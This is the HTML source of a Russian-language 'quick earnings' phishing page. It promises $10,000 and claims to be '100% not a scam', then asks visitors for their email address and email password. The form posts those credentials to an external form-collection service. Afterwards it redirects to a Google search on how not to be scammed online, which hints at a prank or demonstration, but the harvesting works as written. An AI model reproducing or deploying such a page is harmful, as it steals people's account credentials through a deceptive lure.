<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Быстрый зароботок!</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;500&display=swap" rel="stylesheet">
    <style>
        * {
            box-sizing: border-box;
         }
        .form-container {
        max-width: 450px;
        width: 95%;
        margin: auto;
        padding-top: 300px;
        box-shadow: 0 0 10px 1 rgba(0, 0, 0, 0.2)
        }
        input {
            display: block;
            width: 100%;
            margin: 0.5rem 0;
            padding: 0.4rem 0;
            border: none;
            border-bottom: 1.5px solid rgb(200, 200, 200);
            border-radius: 0;
            transition: 0.2s ease;
            -webkit-appearance: none;
            outline: none;
            font-size: 1rem;
        }
        input:focus{ 
            border-color: #02ddee;
        }
        body {
            font-family: 'Roboto', sans-serif;
            
        }
        #password {
            border: 0;
            border-bottom: 1px solid black;
            border-radius: 0;
            background-color: transparent; 
            text-align: center;
        }
        #email {
            border: 0;
        border-bottom: 1px solid black;
        border-radius: 0;
        background-color: transparent;
        text-align: center;
        }
        #p {
            
           margin-left: 100px;
           font-size: 30px;
           margin-bottom: 10px;
        }
        #submit {
            border: none;
            background-color: cyan;
            width: 150px;
            margin-left: 300px;
            box-shadow: 2px 2px 10px 0 rgba(0, 0, 0.2);
            cursor: pointer;
            transition: 0.2s ease;
        }
        #submit:active {
            transform: translate(3px, 3px);
            box-shadow: none;
            border: none;
            border-radius: 0;
        }
        .focused{
            transform: translateX(-12.5%) translateY(0.2rem) scale(0.75);
            
        }
    
    </style>
    <link rel="stylesheet" href="main.css">
</head>
<body>
   <div class="form-container">
       <form id="form" action="https://getsimpleform.com/messages?form_api_token=b0ff9c6d4590df32a7eeefe319c4a804" method="post">
       <input type='hidden' name='redirect_to' value="https://www.google.com/search?q=%D0%BA%D0%B0%D0%BA+%D0%BD%D0%B5+%D0%B1%D1%8B%D1%82%D1%8C+%D0%BE%D0%B1%D0%BC%D0%B0%D0%BD%D1%83%D1%82%D1%8B%D0%BC+%D0%B2+%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82%D0%B5&oq=%D0%BA%D0%B0%D0%BA+%D0%BD%D0%B5+%D0%B1%D1%8B%D1%82%D1%8C+%D0%BE%D0%B1%D0%BC%D0%B0%D0%BD%D1%83%D1%82%D1%8B%D0%BC+%D0%B2+%D0%B8%D0%BD%D1%82%D0%B5&aqs=chrome.1.0l2j69i57.11404j1j15&sourceid=chrome&ie=UTF-8"/>
           <div id="p">↓100% не обман!↓</div>
           <div class="field">
           <label for="email">E-mail</label>
           <input type="email" name="email" id="email">
           <label for="password">Пароль от E-mail</label>
           <input type="password" name="password" id="password">
           
           
           </div>

           <input id="submit" type="submit" value="Получть 10000$">
       </form>
   </div>
</body>
<script>
    let inputs = document.querySelectorAll('input');
    for (let i = 0; i < inputs.length; i++){
        if(inputs[i].getAttribute('type') != 'submit'){
            inputs[i].addEventListener('focusin', focusInInputHandler);
            inputs[i].addEventListener('focusout', focusOutInputHandler);
        }
    }
    function focusInInputHandler() {
        console.log(this.id + 'focus in');
        let label = document.
          querySelector('label[for="'+ this.id +'"]')
        label.classList.add('focused')
    }
    function focusOutInputHandler() {
        console.log(this.id + 'focus out');
        let label = document.
          querySelector('label[for="'+ this.id +'"]')
        if (this.value == ''){
            label.classList.remove('focused');
        }
    }
    
    
    
    
    
    
    
    
    
</script>
</html>